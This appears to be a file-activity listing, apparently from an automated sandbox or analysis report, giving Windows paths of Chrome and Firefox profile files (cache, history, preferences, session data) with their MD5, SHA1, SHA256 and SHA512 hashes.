C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006

MD5 1d5f57b36984d3bc13513937212f7c85
SHA1 6962d480bc6216080b90505c9f25c8a3ed4c8df0
SHA256 7c5544c2101aa4a9ab3bd0ed98d6d1126457f802c8073333d2e7fb7be273dc30
SHA512 dcb01342a2eb9ff3ed03a23b7e0914ccb626e1136c2a24dc4e8144cd785c90acdbffc877408a922519055f0a375b4a31172e3120744de656d55dcd83b84a4f4a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

MD5 0487c0bcad81d7d9c6d1483163ddb4cb
SHA1 6cd2bcd31d114ae7aebda8fcbd5fcd6984e52bb5
SHA256 7f30c729239afea694863f597236ecab7e8fe7c1c9c5077c038384eaea2bc754
SHA512 f0547b71ab816f090043e4c6c920488ec67e684ee8b03f1ac80103d2f93014f53f00211fa8a08648c052939a905a26826b095db6dffa05b819dc6370276bba5d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_3

MD5 0583b2f29167793ecb4f7d9822271d33
SHA1 2bc25c8a19f1bf2db0a6fc4b19d3f54e35c5de6c
SHA256 30a59057a4480026e93131a2935cbcebe084ce90c03adac684ea9ebab5b49e87
SHA512 300ef3ba4b2b1b5f821a344c23682fe21ce683e13f1efc2f373fe066297ea269f188f6b11964bbfe61c63f038bf308cfc4198b4fd816cf7894813e19496cb455

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_2

MD5 011e4aca502eff80e9b69ba422e1dc72
SHA1 be09cade14d8ebb3a8f5e7f0bace2efac4c75dba
SHA256 da52c160a1e6e0d2a6a3be6c40de0359229d3ff38cddf01723c635c38874ed95
SHA512 9ace6cc51c9eade6f8dc516043ab0a20c05c80e7f2166dec86d07b1a341ec011a966ed8613890d33e807d3955f6b21fa4b139f287e9016e199ed6377e533c554

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_1

MD5 b2d1807f13595fff3d736823469b91b0
SHA1 135330bf98559d2ca1c13b7c57ac184aa7f7a8bf
SHA256 728532f66dedb34bc61c7eae6595620547686743aa10ee578800124d169069a6
SHA512 3188d8d9ab11908a25a740f45a3c0ad6ebd2ce557404e1c41e9d1bb7851421785670d166da0df21b7dd602b50def2516b0ef815cb31bc7d379f31c471f44845f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_0

MD5 70e3bd836f8c567906bcaa49f5010691
SHA1 8e38b9b76af2df94e725140e8dd75a6b85285314
SHA256 8459bb7f530f5c7967342b9d3cf18c4233b6af2f1ace7fc28cea0848fb3025d6
SHA512 96ab01daaf22b4a4f09c64c19513d102f8227aca17aeccdafbc54bce30f68510ee953b6e9ea139cc409d7ce91f3d6fddcab4d1581b42bf20e91e18ada2c1b73e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History

MD5 0561e5d4bf52abeaa7ff8afedf3b9617
SHA1 aa1ff7e95ff2ebbf61c93cb266040758cb7453bc
SHA256 0b04a37af9796d012d948db90b719402f96a702ff1c1acbcc6beb029d265d46e
SHA512 577cd358bc896b648a3719d03cf799253e033d6f7ee8739a705649296b9588918634ea2e19f13bfd46a5597cf23ca911df79ea7f5e67fca869f7fe78c94ac55c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 fcc25d0466bb67bf5e08da8d17b18106
SHA1 a765fc4aa49dd24501c2bb0782997bf6e4aad5a8
SHA256 97ee7c8778ea944125260e0a0edbeb2f1d9528046083acaf388ace22469b7202
SHA512 90df55d5c1bf0efea1acaf22acc6aed0e7713a212c1c68a5aee5c01e1648770f9a94fc45cd681a3123e891de8270b75bd64e07c4edfb43a3566d7595247e1458

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log

MD5 a0ab472aede096a44454a2de0837d841
SHA1 920535ecb6c59e6425b6f727e4550bcfcff99c4a
SHA256 61cbb998c62ff3da6a9426cdf61e858fdbf7a542e2fe114864c1e73f0300679b
SHA512 26e4ff59cd5d0c4aa2ff110097b8ec3d29d500f27d0be07535ff5819fcffa8327cd7b96c2757a440a04cc6f3fcdd9d7341fe0d760fca16dda5f903d3781436b4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG

MD5 a75c9d9f7e3dc1c628fc2ab4c1a1638d
SHA1 39ccab2ebfa4e9a6b36838251063a4799acd1cf6
SHA256 a9708d87b3a5fac9c523489b8d48bc583e5171004e55785c37fd5a3d8259d669
SHA512 f655942cf138bbf820d9510bf3686ebd837183d5aa8b6571abba967bfb5fff7deedd126578ec6e0f8057457fd3d29e3284e909506c6afe9fa464b86fd65c9a64

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log

MD5 209894e5acd8cb0e1d1881c01311fec1
SHA1 e2624d8fffd4e7da3616ef063993152df5917ae2
SHA256 708a9381977bd2185ba5371a39dae7c93c2d92726e00849e0363be36723e5444
SHA512 bf16034b0e3aa00471cf9e969420c7dec69cb2db41d37008a29cfc6d428bcf0f579771da3518af162a9fe493eee9d8073858ecaa8a1fe8aea9bbc9bdb94a55f3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG

MD5 aee7223e9d95e4079f4053078a7dbfc4
SHA1 d4f29541284e12f07563f8db8f290329938fff34
SHA256 c78a2527117909f73ac32a925ffdc97097497a02a5d2067f31d7dbdd26650d3e
SHA512 a4d957eb0c306ce625d2968a662da3b28105ee3746932b2b0f242ef53d9504a3eee0eed04b127d8ad860797bc8d2bcddd43ac22bb5584a7ab177266d27065e28

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13363881470592043

MD5 1db1b5d01f13a2fdb2e9bafeb926762f
SHA1 1fe6b7a2560ed0fcd240013648c1d9475659ddb8
SHA256 9f618beab23e7345c3fd7ace9da47a307f1fc917b7b05aecd4fa022dc78b5344
SHA512 309ba390505e2404c8c20d1e2d87025483a0b330b5195c91fb37f186cef06d0b7c0e7e82dd1812bd269496c1901aa1a6bcc8be9033a169359319520051a17fce

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log

MD5 e1d7ad574b12ac5cdd9b0190b15fed06
SHA1 30198ae0bb081721a7a06dbe944c32caf8a84595
SHA256 94433515e0ba6f8dd7fdb5a327451ed81b472fd53a9f3ddaa354663c93b15e38
SHA512 bc66ac3d0f5e016c1b4d988de419f7c4bcb3e2515d98fd45a7473971c27a6d2e3ae0f061cb2a7d97930c57fc5e47acd22053798dfc4701a95b06df9cfee4e558

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

MD5 044168049ec13e960a68679d062b1823
SHA1 c10e46dc8892c0a290df59590512cd1ec0faf0c4
SHA256 c1148288a30cba124607b5cc680619b61011630976349b3091cb92a72c88dc87
SHA512 6dc64947cc87bbb9669c59af28dd57bd9eb03675e02a4d62120fa06e843008d83172d4924cf95250c7d435f356e3fe54a9d05fe4aa85ac0c4134e1302c0fa276

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 e2d2ede245e6eeb1b02d02eda21daf8d
SHA1 b3b4b684f55569890735eaf69d8e3ae5763101d5
SHA256 4c3e7e2c22d700e115530b74ee6ea4495dbb9c4d546c511d91ca58d5b19587b0
SHA512 914ee63710e99c7e5653c30a24e2107e2dd0f4bf6e63bded17db62703fb9fe28bb1666b50f65aebaf69df793934537f94bcd8a331cfed55d72dbb9d017a37b96

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\7ba35f08-adce-4541-b14b-c608df3a0a84.tmp

MD5 d859f7890fa710826e64bdce80861332
SHA1 1ab1b34f3504c0aa87a41505f037927f9b4e37bb
SHA256 6cc906aaf49e1d9d7a7c3afc37a8cf613c3433a8e8eed07fc4f81cbe29666b09
SHA512 a96c88a1232ec8f9d8c38c376e7eebefdde437a3e0a66183977753dffc4641dc881a874230af79f17ca0b17f7eeb271f9e431c89b302c23da97fa87267f050a6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 55167a52626bbe6ecd18a987f491dd87
SHA1 749c908fe869f721de5106301b97ed4a46d91ecd
SHA256 29eede5a95ccab4fd4e591a12f76bb66a89fb3968531661023f561243d507b59
SHA512 ef36d2a2309a5e6ff318fc5631e4ae156039155c0781f0ab6d2e30e551d2dffadd40dde6021993bdb0744b7b44c877565a4bcb40aa762559fb899a151e107187

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 31c3bd7906496ded9d26eecbecd20b00
SHA1 714471b05791c3c3fbe78340fffe09e6b8e00cd8
SHA256 c9e426edd4cdd79089830e309aeb089763a8c1febf16db9d77823466dc056c8a
SHA512 72da6b031ebff0115342450bd4d3c8f6c29ea10881cd3c9c366f7d081d5041fec9cbc908328281988ed06562666a1ce468f0d5371a3d54ac7ab48854b29ef668

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 3e1752852eac1fb7adbff0c84926b1e7
SHA1 49807ca3de260f545a1809f327daf2ca0b78bb0e
SHA256 c93ecadae3703022e5c245d6cffe2119c40e82fa3bf1382f1a3baa36b818ac24
SHA512 92d82e05e9ec4e87967856ba0faadd10cf43891b61a5e38e832e7bf132e1dc209958a2860aa3ada38033e16c98b140f4bc43b1da3a3e2a00ecc385aa523d199c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 1ffc28271d32bd8d542650fa38392782
SHA1 e6b11e14062befb0a995aeeaa02cb6f51f960c55
SHA256 4d1ecda5be143437f5a186843298926399b20a1fdf6f2c1162c78a51dfe6ac7b
SHA512 385eab5aa9ba7a3adb5c87b4bc268d9f41e0190189925c969a5d7244daa69501f807c726f60684efb586781aa14f34fe08752541bfe0ff6e770d7f32add4c317

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 0132d1ad7895f0d61a4fd17d5689ff92
SHA1 9f3de51c94a3d6e8d3a5fa6cf94420a187cb05a1
SHA256 75dcdda1155cefa8438ca7276ddb1e10ca04d8b236869505f65f89b40b1112b1
SHA512 82f2aa975b0555c10e205d6ee347e0ba1db5893b966cf887d874db52c937a8de63103cad40bb1b7e53b47a4c017937fe64af21c120c998315db8a5e74cda8fb4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 c6775069bff38fe0dd7d305e6dff434d
SHA1 93ae099d494112f78e87a0b8b5fe549548ca403a
SHA256 2dff95e476ba9bcee6a21c737ef57bc97ae223a62cce2908595352391f8ee4e8
SHA512 6716250ee65c0d0dae8a5deedd2f77d9c066969895fa5e4cc6821509ef17dbc76b137922e169a78e1ef5badcdd036a12e2386d76dd297d997d73159b38bdd453

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 08f94295f5ba10791d32a39fa2db7358
SHA1 972fc9f03dde5ad04b1388bc6417cafbf19fe2cf
SHA256 6ea8208dcacd1aec354451548d60efad1847ab6adb9a20350a51c6b9391ff658
SHA512 0074d42a594d0a647a36f9b3cdce34ab25bca461b682d66fa399158d467c2c1a2b97af9b2638845e3341e1c092867f7331a003395a0cf67745038991edaa593d

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\r6lt1pc6.default-release\activity-stream.discovery_stream.json.tmp

MD5 134d3ee97b3a3f8d4406bda2f9d1e0bf
SHA1 4d29f8f11b3be7a04bc027a60c033c521524ee8a
SHA256 6bbfe381a8de441b3850c3300abbf491727481d24780c25f373b881b3d069c80
SHA512 9b73361f2a129f3acac9eead27c8ee774248925967898a4a7cca912c8cf2d7665f07e3a648b32e5dfd58e8be8b9491f6e5778512f827a0d17c3c454350fa0f83

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\r6lt1pc6.default-release\prefs.js

MD5 cd4b0bff5b70379888dbb3f6abedcb73
SHA1 ea951cbd4be5b77762991095a05389da6689ac99
SHA256 0a512c73e90ffc6fd1c5a15a3a149bb6d3dde7e85e845889d72b79544278104f
SHA512 7829a0f927542fda2d26e25842602fb6307b279783b52e84649d10127fd20d44fb033b9481b68f07d129a338b421e782f120a333aa35ff9f06a4545cac59706c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\r6lt1pc6.default-release\prefs.js

MD5 09cc263768f03fae9596d1c187daf969
SHA1 c0522743a1c7779df1f9ffbd9df7b0a1e600f1a0
SHA256 834e2b4d8ffc3cd3b8c30a768d56313d677beaae782edc7f56f07437ea6ef8e6
SHA512 2b9d1d27f47c16725450539302236ac67e087d994f8d8b194532d5db892a83982a0cfd033df7309eee50e69a716d8f534d3cc27850727e7e4f4346290dcc6dd1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\r6lt1pc6.default-release\sessionstore.jsonlz4

MD5 a9091af22a66549a135c0829f15bdff9
SHA1 2762ce05d8506ca4ede3d2c1ef4ce738815be319
SHA256 6056da673e7d983be062202d146029bc4551e0eb57dc1372c15efbfaf55e7aa5
SHA512 5324fa641e731abec6aecb453db0615a39875dab07441988957ee371812863fac79163ae55d474ba3d3158ac78233d18bad6fe67320dde32f68f5e59e1497d34

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\r6lt1pc6.default-release\sessionCheckpoints.json.tmp

MD5 e6c20f53d6714067f2b49d0e9ba8030e
SHA1 f516dc1084cdd8302b3e7f7167b905e603b6f04f
SHA256 50a670fb78ff2712aae2c16d9499e01c15fddf24e229330d02a69b0527a38092
SHA512 462415b8295c1cdcac0a7cb16bb8a027ef36ae2ce0b061071074ac3209332a7eae71de843af4b96bbbd6158ca8fd5c18147bf9a79b8a7768a9a35edce8b784bf

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\r6lt1pc6.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 b1de2321efccd18740dd89889cecff29
SHA1 074d67ec00ac8c978831f07cde03ff95df26ec9f
SHA256 2d1f75425568d1f60f55c33cb1ce941b61f30aa65fa8e90bb2fc05c310924b7a
SHA512 e3d9d1d714043f2e8c0dd2e9e0dd1085fca639c2b21ed7f584b48b9af76adfbb6ad3a573220afa9d280fbf8d3f7b9f931e420029b3e3e02e984ae785328c07f2